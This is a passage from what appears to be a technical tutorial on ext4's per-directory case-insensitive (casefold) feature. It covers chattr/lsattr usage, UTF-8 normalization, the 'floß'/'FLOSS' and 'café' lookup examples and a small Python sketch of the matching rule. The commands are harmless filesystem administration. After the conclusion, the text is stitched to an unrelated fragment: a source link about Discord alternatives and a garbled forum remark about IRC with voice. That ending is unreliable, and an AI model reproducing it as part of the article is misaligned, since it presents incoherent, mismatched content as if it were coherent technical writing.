The Casefold flag recurses into nested directories. Therefore:

$ mkdir CI_dir
$ chattr +F CI_dir
$ mkdir CI_dir/foo
$ lsattr CI_dir
----------------F--- CI_dir/foo

It is possible to mix case-insensitive and case-sensitive directories in the same tree:

$ mkdir CI_dir
$ chattr +F CI_dir
$ mkdir CI_dir/foo
$ chattr -F CI_dir/foo
$ lsattr .
----------------F--- CI_dir
$ lsattr CI_dir
-------------------- CI_dir/foo

Remember, however, that in the examples above the order of the commands matters, since a directory cannot have its Casefold attribute flipped if it is not empty.

Non-English characters

Currently, only the UTF-8 encoding is supported, and I am not aware of plans to expand it to more encodings. While different encodings make a lot of sense for speakers of Eastern languages for encoding-compression reasons, I'm not aware of anyone currently working on that for Linux.

With that said, the Linux implementation performs the Canonical Decomposition normalization process before comparing strings. That means that canonically equivalent characters can be correctly found using a differently normalized name. For instance, in some languages, like German, the upper-case version of the letter ß (Eszett) is SS (or U+1E9E ẞ LATIN CAPITAL LETTER SHARP S). Thus, it makes sense for a German speaker to look for a file named "floß" (raft, in English) using the string "FLOSS":

$ touch CI_dir/floß
$ ls CI_dir/FLOSS

There are also multiple ways to combine accented characters.
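The comparison rule described above, casefolding after Canonical Decomposition, can be modelled in userspace with Python's unicodedata module. This is a sketch of the matching rule, not the kernel's code:

```python
import unicodedata


def names_match(a: str, b: str) -> bool:
    """Compare two file names the way a casefolded lookup does:
    apply Canonical Decomposition (NFD), then case-fold, then compare."""
    def fold(s: str) -> str:
        return unicodedata.normalize("NFD", s).casefold()
    return fold(a) == fold(b)


# German sharp s: case-folding maps both 'ß' and 'SS' to 'ss'
print(names_match("floß", "FLOSS"))            # True
# Precomposed U+00E9 vs 'e' followed by combining acute (U+0301)
print(names_match("caf\u00e9", "cafe\u0301"))  # True
```

The second comparison is exactly why visually identical names typed with different keyboard layouts still resolve to the same file in a casefolded directory.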
Our method ensures, for instance, that multiple encodings of the word café (coffee, in Portuguese) are interchangeable in a casefolded lookup. Let's see something cool. For this to work, you might want to copy-paste the command below instead of typing it. Let's create some files:

$ touch CI_dir/café CI_dir/café CS_dir/café CS_dir/café

How many files were created? Can you explain it?

Conclusion

The case-insensitive feature as implemented in Ext4 is a non-intrusive mechanism to support this behavior for those who need it, while minimizing the impact on other applications. Given its per-directory nature, it is safe to enable the feature bit filesystem-wide and let applications enable it on directories as needed. It is simple to use and should yield higher performance for applications that previously had to emulate case-insensitivity in userspace. Hopefully, we will soon see this feature enabled by default in distro kernels.

Source
  22. https://www.proofhub.com/articles/discord-alternatives Neme said that little by little we will go back to the command line. The idea would be something like IRC with voice, blur, etc. There is an open-source one; when I find it I'll come back with an edit. It would be fine if it didn't answer the questions above in real time.